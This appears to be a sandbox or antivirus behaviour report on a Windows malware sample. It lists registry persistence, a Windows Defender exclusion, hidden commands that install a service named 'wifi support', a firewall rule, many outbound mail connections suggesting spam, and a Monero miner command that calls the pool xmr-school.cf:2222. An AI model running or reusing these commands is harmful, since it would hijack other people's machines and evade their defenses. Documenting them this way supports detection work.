Technical Information
- [<HKLM>\System\CurrentControlSet\Services\meujtone] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\meujtone] 'ImagePath' = '%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\meujtone] 'ImagePath' = '%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe'
- 'meujtone' %WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d"<Full path to file>"
- 'meujtone' %WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\meujtone' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\uzbtwrxh.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\uzbtwrxh.exe to %WINDIR%\syswow64\meujtone\uzbtwrxh.exe
- 'mi##########m.mail.protection.outlook.com':25
- 'mx.####o.locaweb.com.br':25
- 'mx####.carrierzone.com':25
- 'mx.#p.pl':25
- 'sl###.#rg.1.arsmtp.com':25
- 'ma##.#elkomsa.net':25
- 'm.###tube.com':443
- 'he#####olicy.usc.edu':443
- 'mt##.##0.yahoodns.net':25
- 'in###gram.com':443
- 'mx.##wered.name':25
- 'mx.###eric-isp.com':25
- 'sm##.#opmail.com':25
- 'ma##.poczta.pl':25
- 'mx##.mb5p.com':25
- 'mx##.###us-vadesecure.net':25
- 'sm#####.hosting.orange.pl':25
- 'it#####2.itscomp.com':25
- 'ma##.#-email.net':25
- 're###1.gse.it':25
- 'ma###.mail-vert.fr':25
- 'mx#.free.fr':25
- '31.#3.64.52':443
- 'mx#.owt.com':25
- 'mx.###zta.onet.pl':25
- 'mx.#len.pl':25
- 'ma##.#qeumco.com':25
- 'ma##.#nwiredbb.com':25
- '15#.#40.201.174':443
- 'ul######.##il.protection.outlook.com':25
- 'mx#.#mpal.com':25
- 'ma##.#upereva.it':25
- '10#.#62.165.235':443
- 'mx#.###-sd.iphmx.com':25
- 'mx#######703.gslb.pphosted.com':25
- 'mx.###-group.com':25
- 'mx#######f01.gslb.pphosted.com':25
- 'mx#.#anmail.net':25
- 'mx#######b02.gslb.pphosted.com':25
- 'ma###.eircom.net':25
- 'sk##nks.com':25
- 'sm#####x.turknet.net.tr':25
- 'ma##.#eranit.com.tr':25
- 'mx.###yamzone.com':25
- 'sm##.##cureserver.net':25
- 'gw.##odvian.com':25
- 'mx.#####.#e.cust.b.hostedemail.com':25
- 'mx#.##tsolmail.net':25
- 'mx###.mb1p.com':25
- 'mx###.##tsol.xion.oxcs.net':25
- 'na#.###.#rotection.outlook.com':25
- 'mx#######c01.gslb.pphosted.com':25
- 'cl#####6.netcore.co.in':25
- 'ma###.#orpmailsvcs.com':25
- 'mx.###cali.co.uk':25
- 'cm######1.mail.tiscali.it':25
- 'ma##.#ailerhost.net':25
- 'ws#.edu':443
- '15#.#40.201.63':443
- 'mx######-com.icoremail.net':25
- 'xm###chool.cf':2222
- 'ma###.##mebrightmail.com':25
- 'fm##ers.com':25
- 'ma##.#onglom.com':25
- 'es##.##ntas.iphmx.com':25
- 'mx.##.#tinternet.com':25
- 'mx#######e01.gslb.pphosted.com':25
- 'fw####.servlinks.com':25
- 'mx#######101.gslb.pphosted.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mx#######e02.gslb.pphosted.com':25
- 'mx#######a01.gslb.pphosted.com':25
- 'al######x-vip1.prodigy.net':25
- 'mx#######b01.gslb.pphosted.com':25
- 'mx#######602.gslb.pphosted.com':25
- 'fm######01.emirates.net.ae':25
- 'cc#.#pamfree.cz':25
- '_d####.####f04adb09.own-initiative.com':25
- 'mx.####gnerclosets.com':25
- 'mx######91d01.pphosted.com':25
- 'mx##.#-online.de':25
- 'mx#######502.gslb.pphosted.com':25
- 'mx#######501.gslb.pphosted.com':25
- 'ma##.#nowroute.com':25
- 'mx##.##il.icloud.com':25
- 'aspmx.l.google.com':25
- 'un###v8.un.org':25
- '62.##4.41.45':486
- 'ni###eimr.cn':443
- 'mx#.#harter.net':25
- 'mx###.comcast.net':25
- 'mx#.#vinf.com':25
- 'po####afabrics.com':25
- 'sm###in.sfr.fr':25
- 'd1######.#ss.barracudanetworks.com':25
- 'mc######.mx.a.cloudfilter.net':25
- 'ma#####ter.fast.net.uk':25
- 'mx###.##stedmxserver.com':25
- 'mx##.mail.com':25
- 'sm###.#ail.medcity.net':25
- 'mx.#####.#om.cust.b.hostedemail.com':25
- 'google.com':80
- '62.##4.41.49':430
- '62.##4.41.50':430
- '91.#43.33.5':430
- '62.##4.41.48':430
- '62.##4.41.47':430
- '62.##4.41.46':430
- 'pu######1.mail2world.com':25
- 'mx.##teria.pl':25
- 'ma###esia.com':25
- 'mx.####oupecuador.com':25
- 'em##.freenet.de':25
- 'sm###.#rvatskamail.com':25
- 'mx.###l-data.net':25
- 'cx#.##.#.cloudfilter.net':25
- 'mx#.#eznam.cz':25
- 'gl####nsecurity.com':25
- 'ma###.#ailinator.com':25
- 'in#######.exchangedefender.com':25
- 'mx.##a.untd.com':25
- 'i7##.###lsecurity-nec.jp':25
- http://www.google.com/
- 'ni###eimr.cn':443
- 'gl####nsecurity.com':25
- 'm.###tube.com':443
- 'fm##ers.com':25
- 'he#####olicy.usc.edu':443
- 'mt##.##0.yahoodns.net':25
- 'mx####.carrierzone.com':25
- 'in###gram.com':443
- 'ma##.poczta.pl':25
- 'sm##.#opmail.com':25
- '_d####.####f04adb09.own-initiative.com':25
- 'it#####2.itscomp.com':25
- 'al######x-vip1.prodigy.net':25
- 'ma##.#-email.net':25
- 'mx.###eric-isp.com':25
- '91.#43.33.5':430
- 'po####afabrics.com':25
- 'mx#.#anmail.net':25
- 'gw.##odvian.com':25
- 'sm#####x.turknet.net.tr':25
- 'alt1.aspmx.l.google.com':25
- 'alt2.aspmx.l.google.com':25
- 'mx#.##tsolmail.net':25
- 're###1.gse.it':25
- 'sl###.#rg.1.arsmtp.com':25
- 'cd#.#eb.wsu.edu':443
- 'cm######1.mail.tiscali.it':25
- 'ws#.edu':443
- '15#.#40.201.63':443
- 'ul######.##il.protection.outlook.com':25
- '15#.#40.201.174':443
- 'cl#####6.netcore.co.in':25
- 'xm###chool.cf':2222
- 'mx#.owt.com':25
- '31.#3.64.52':443
- 'mx.###zta.onet.pl':25
- 'mx#######b01.gslb.pphosted.com':25
- '62.##4.41.45':486
- 'aspmx.l.google.com':25
- 'ma##.#nowroute.com':25
- 'mx####.##il.gm0.yahoodns.net':25
- 'mx#######a01.gslb.pphosted.com':25
- 'mx#.###-sd.iphmx.com':25
- 'mx#######.mail.am0.yahoodns.net':25
- 'mx#.#eznam.cz':25
- 'fw####.servlinks.com':25
- 'ma##.#onglom.com':25
- 'es##.##ntas.iphmx.com':25
- 'in#######.exchangedefender.com':25
- 'ma###.#ailinator.com':25
- 'mx.##.#tinternet.com':25
- 'na#.###.#rotection.outlook.com':25
- 'sm###.#rvatskamail.com':25
- 'pu######1.mail2world.com':25
- 'mx.##teria.pl':25
- 'ma##.#nwiredbb.com':25
- 'mx######-com.icoremail.net':25
- 'ma###.##mebrightmail.com':25
- 'ma#####ter.fast.net.uk':25
- 'mx#.#vinf.com':25
- 'ma###esia.com':25
- 'mx###.##stedmxserver.com':25
- 'mx.###l-data.net':25
- '62.##4.41.49':430
- '62.##4.41.50':430
- '62.##4.41.48':430
- '62.##4.41.47':430
- '62.##4.41.46':430
- 'd1######.#ss.barracudanetworks.com':25
- '10#.#62.165.235':443
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK mx.###eric-isp.com
- DNS ASK ro###tmail.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK ne####essman.com
- DNS ASK mx.##wered.name
- DNS ASK in###gram.com
- DNS ASK ju###fou.com
- DNS ASK he#####olicy.usc.edu
- DNS ASK m.###tube.com
- DNS ASK li###pand.org
- DNS ASK te###msa.net
- DNS ASK ma##.#elkomsa.net
- DNS ASK vp.pl
- DNS ASK sl##c.org
- DNS ASK wp.pl
- DNS ASK mx.#p.pl
- DNS ASK nt##os.net
- DNS ASK mx####.carrierzone.com
- DNS ASK gl##o.com
- DNS ASK mx.####o.locaweb.com.br
- DNS ASK xm###chool.cf
- DNS ASK ul##h.ca
- DNS ASK ul######.##il.protection.outlook.com
- DNS ASK fr##mail.it
- DNS ASK ma##.#upereva.it
- DNS ASK po###a.onet.pl
- DNS ASK sm##.#opmail.com
- DNS ASK vi###mail.com
- DNS ASK sl###.#rg.1.arsmtp.com
- DNS ASK ws#.edu
- DNS ASK po##ta.pl
- DNS ASK o2.pl
- DNS ASK mx.#len.pl
- DNS ASK on#t.pl
- DNS ASK mx.###zta.onet.pl
- DNS ASK cr####oleman.com
- DNS ASK mx#.owt.com
- DNS ASK on##ne.fr
- DNS ASK mx#.free.fr
- DNS ASK op.pl
- DNS ASK or##ga.fr
- DNS ASK ma###.mail-vert.fr
- DNS ASK gs#.it
- DNS ASK re###1.gse.it
- DNS ASK gm##ln.com
- DNS ASK ma##.#-email.net
- DNS ASK ma###agent.com
- DNS ASK it##omp.com
- DNS ASK it#####2.itscomp.com
- DNS ASK or##ge.pl
- DNS ASK sm#####.hosting.orange.pl
- DNS ASK pe###epc.com
- DNS ASK mx##.###us-vadesecure.net
- DNS ASK ti##jo.com
- DNS ASK ho##ail.com
- DNS ASK mx##.mb5p.com
- DNS ASK ma##.poczta.pl
- DNS ASK no#s.fr
- DNS ASK yo##ail.com
- DNS ASK mx#.#eznam.cz
- DNS ASK cp#.org
- DNS ASK mx.###yamzone.com
- DNS ASK se##nit.com
- DNS ASK ma##.#eranit.com.tr
- DNS ASK sh#####evelopers.com
- DNS ASK tu##.net
- DNS ASK sm#####x.turknet.net.tr
- DNS ASK sk##nks.com
- DNS ASK ei##om.net
- DNS ASK ma###.eircom.net
- DNS ASK ta##et.com
- DNS ASK mx#######b02.gslb.pphosted.com
- DNS ASK le#.com
- DNS ASK ha##ail.net
- DNS ASK ma##.#ailerhost.net
- DNS ASK mx#.#anmail.net
- DNS ASK mx#######f01.gslb.pphosted.com
- DNS ASK wa###roup.com
- DNS ASK mx.###-group.com
- DNS ASK gh#.org
- DNS ASK mx#######703.gslb.pphosted.com
- DNS ASK sy##hes.com
- DNS ASK mx#.###-sd.iphmx.com
- DNS ASK ai##z.co.nz
- DNS ASK ts###ha.co.jp
- DNS ASK i7##.###lsecurity-nec.jp
- DNS ASK em##l.com
- DNS ASK sa###mzone.com
- DNS ASK sm##.##cureserver.net
- DNS ASK sh####travel.com
- DNS ASK sa#####rivastava.com
- DNS ASK it###ogroup.com
- DNS ASK cd#.#eb.wsu.edu
- DNS ASK cm######1.mail.tiscali.it
- DNS ASK ti###li.co.uk
- DNS ASK mx.###cali.co.uk
- DNS ASK pr#####sive-medical.com
- DNS ASK ma###.#orpmailsvcs.com
- DNS ASK ra####studio.com
- DNS ASK ra##ik.net
- DNS ASK cl#####6.netcore.co.in
- DNS ASK dw#.co.uk
- DNS ASK mx#######c01.gslb.pphosted.com
- DNS ASK wi###wslive.com
- DNS ASK ma##.#qeumco.com
- DNS ASK na#.###.#rotection.outlook.com
- DNS ASK nu###icable.fr
- DNS ASK mx###.##tsol.xion.oxcs.net
- DNS ASK mx###.mb1p.com
- DNS ASK gt##inc.com
- DNS ASK mx#.##tsolmail.net
- DNS ASK ha##sco.com
- DNS ASK alt2.aspmx.l.google.com
- DNS ASK ly##s.de
- DNS ASK mx.#####.#e.cust.b.hostedemail.com
- DNS ASK ho###ian.com
- DNS ASK gw.##odvian.com
- DNS ASK sa###mjain.com
- DNS ASK alt1.aspmx.l.google.com
- DNS ASK ra###oup.com
- DNS ASK ka###ail.com
- DNS ASK sa###m.co.uk
- DNS ASK eq##mco.com
- DNS ASK ma##.#nwiredbb.com
- DNS ASK le###renet.com
- DNS ASK ei#.ae
- DNS ASK fm######01.emirates.net.ae
- DNS ASK e-##s.com
- DNS ASK mx#######b01.gslb.pphosted.com
- DNS ASK do##app.in
- DNS ASK at#.net
- DNS ASK al######x-vip1.prodigy.net
- DNS ASK ca###ianbct.com
- DNS ASK mx#######a01.gslb.pphosted.com
- DNS ASK cn#.com
- DNS ASK mx#######e02.gslb.pphosted.com
- DNS ASK ve##zon.net
- DNS ASK mx####.##il.gm0.yahoodns.net
- DNS ASK ro##rs.com
- DNS ASK mx#######.mail.am0.yahoodns.net
- DNS ASK fe##ish.com
- DNS ASK cb#.com
- DNS ASK mx#######101.gslb.pphosted.com
- DNS ASK fi###ambank.com
- DNS ASK mx#######e01.gslb.pphosted.com
- DNS ASK ch##tva.com
- DNS ASK fw####.servlinks.com
- DNS ASK bt###ernet.com
- DNS ASK mx.##.#tinternet.com
- DNS ASK ci##as.com
- DNS ASK os##.net
- DNS ASK at##s.cz
- DNS ASK mx#######602.gslb.pphosted.com
- DNS ASK cc#.#pamfree.cz
- DNS ASK _d####.####f04adb09.own-initiative.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK un.org
- DNS ASK un###v8.un.org
- DNS ASK ou####eindia.com
- DNS ASK aspmx.l.google.com
- DNS ASK ic##ud.com
- DNS ASK mx##.##il.icloud.com
- DNS ASK dj####entific.com
- DNS ASK es##.##ntas.iphmx.com
- DNS ASK mx#.#mpal.com
- DNS ASK ma##.#nowroute.com
- DNS ASK mx#######501.gslb.pphosted.com
- DNS ASK ve##ion.net
- DNS ASK sl#.com
- DNS ASK mx#######502.gslb.pphosted.com
- DNS ASK t-##line.de
- DNS ASK mx##.#-online.de
- DNS ASK be###outh.com
- DNS ASK mx######91d01.pphosted.com
- DNS ASK de####erclosets.com
- DNS ASK mx.####gnerclosets.com
- DNS ASK da###lhai.com
- DNS ASK ow####itiative.com
- DNS ASK ni###eimr.cn
- DNS ASK am###trade.com
- DNS ASK ae#.com
- DNS ASK co###cola.com
- DNS ASK ma##.#onglom.com
- DNS ASK ly##s.com
- DNS ASK mx.#####.#om.cust.b.hostedemail.com
- DNS ASK hc####lthcare.com
- DNS ASK sm###.#ail.medcity.net
- DNS ASK ma##.com
- DNS ASK mx##.mail.com
- DNS ASK re####-for-kids.com
- DNS ASK mx###.##stedmxserver.com
- DNS ASK fa###et.co.uk
- DNS ASK ma#####ter.fast.net.uk
- DNS ASK mc##i.com
- DNS ASK pg.com
- DNS ASK mc######.mx.a.cloudfilter.net
- DNS ASK d1######.#ss.barracudanetworks.com
- DNS ASK mo###onet.fr
- DNS ASK sm###in.sfr.fr
- DNS ASK iv##f.com
- DNS ASK mx#.#vinf.com
- DNS ASK ne###ape.net
- DNS ASK ne##ero.com
- DNS ASK mx.##a.untd.com
- DNS ASK de##ja.com
- DNS ASK ma###.##mebrightmail.com
- DNS ASK ch##a.com
- DNS ASK mx######-com.icoremail.net
- DNS ASK in##ria.pl
- DNS ASK fr####erpower.com
- DNS ASK em##l.cz
- DNS ASK google.com
- DNS ASK pu######1.mail2world.com
- DNS ASK ma###todd.com
- DNS ASK ch##ter.net
- DNS ASK mx#.#harter.net
- DNS ASK pl#.net
- DNS ASK po####afabrics.com
- DNS ASK co##ast.net
- DNS ASK mx###.comcast.net
- DNS ASK co###ctapps.com
- DNS ASK in#######.exchangedefender.com
- DNS ASK gl####nsecurity.com
- DNS ASK ma###nator.com
- DNS ASK ma###.#ailinator.com
- DNS ASK fm##ers.com
- DNS ASK se##am.cz
- DNS ASK co###y.edu.co
- DNS ASK co#.net
- DNS ASK pa###lly.com
- DNS ASK mx.###l-data.net
- DNS ASK hr####kamail.com
- DNS ASK sm###.#rvatskamail.com
- DNS ASK ex##te.com
- DNS ASK fr##net.de
- DNS ASK em##.freenet.de
- DNS ASK ac####pecuador.com
- DNS ASK mx.####oupecuador.com
- DNS ASK ma###esia.com
- DNS ASK in##ria.eu
- DNS ASK co##lom.com
- DNS ASK mx.##teria.pl
- DNS ASK cx#.##.#.cloudfilter.net
- DNS ASK se###u-inc.com
- '%WINDIR%\syswow64\meujtone\uzbtwrxh.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\meujtone\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\uzbtwrxh.exe" %WINDIR%\SysWOW64\meujtone\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create meujtone binPath= "%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description meujtone "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start meujtone' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\meujtone\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\uzbtwrxh.exe" %WINDIR%\SysWOW64\meujtone\
- '%WINDIR%\syswow64\sc.exe' create meujtone binPath= "%WINDIR%\SysWOW64\meujtone\uzbtwrxh.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description meujtone "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start meujtone
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o xmr-school.cf:2222 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+50000 -p x -k -a cn/half